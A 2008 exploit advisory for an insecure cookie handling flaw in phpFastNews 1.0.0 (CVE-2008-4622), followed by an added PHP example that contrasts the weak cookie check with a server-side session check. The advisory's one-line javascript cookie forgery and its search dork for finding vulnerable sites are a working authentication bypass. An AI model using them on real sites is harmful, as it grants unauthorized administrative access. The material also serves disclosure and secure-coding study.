phpFastNews 1.0.0 - Insecure Cookie Handling
Author: Qabandi
type: webapps
platform: php
date_added: 2008-10-17
verified: 1
codes: OSVDB-49175;CVE-2008-4622
#################################################
## Qabandi iqa[at]hotmail.fr ##
## from Kuwait ##
#################################################
\\ phpFastNews
// Insecure cookie handling
\\
// Go to any website that has the script installed
\\ type the following code into the Address Bar
//
\\ javascript:document.cookie = "fn-loggedin = 1";
//
\\ Refresh, do whatever, and you will be logged in
//
\\ Dork:intext:"Powered by phpFastNews"
#################################################
## Greetz: Killer Hack, Str0ke ##
#################################################
PEACE
# milw0rm.com [2008-10-18]
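
Added example, not part of the original advisory and not phpFastNews source code: the weak pattern the advisory describes (login state taken from a cookie the browser controls) beside a server-side session check that a forged cookie cannot satisfy. Only the cookie name fn-loggedin comes from the advisory; the function names, the $users store and the demo password are hypothetical.

```php
<?php
// Added example; not phpFastNews source code. Function names and the
// $users store are hypothetical. Only the cookie name is from the advisory.

// The session cookie carries a random ID only; the flags limit theft and fixation.
session_start([
    'cookie_httponly' => true,
    'cookie_secure'   => true,
    'cookie_samesite' => 'Strict',
    'use_strict_mode' => true,
]);

// Weak pattern the advisory describes: login state is whatever the browser sends.
function is_logged_in_weak(array $cookies): bool
{
    return ($cookies['fn-loggedin'] ?? '') == '1';
}

// Hardened: login state is read from server-side session data only.
function is_logged_in(array $session): bool
{
    return ($session['authenticated'] ?? false) === true;
}

// Set the flag only after the password verifies, and rotate the session ID.
function login(string $user, string $password, array $users): bool
{
    if (!isset($users[$user]) || !password_verify($password, $users[$user])) {
        return false;
    }
    session_regenerate_id(true);
    $_SESSION['authenticated'] = true;
    $_SESSION['user'] = $user;
    return true;
}

// Constructed demo data: one account and a request carrying the forged cookie.
$users  = ['editor' => password_hash('constructed-demo-password', PASSWORD_DEFAULT)];
$forged = ['fn-loggedin' => '1'];

var_export([
    'weak check, forged cookie'    => is_logged_in_weak($forged),
    'session check, forged cookie' => is_logged_in($_SESSION),
    'login, wrong password'        => login('editor', 'guess', $users),
    'login, correct password'      => login('editor', 'constructed-demo-password', $users),
    'session check after login'    => is_logged_in($_SESSION),
]);
```

Run from the PHP command line, the forged cookie satisfies only the weak check; the session check stays false until login() has verified the password.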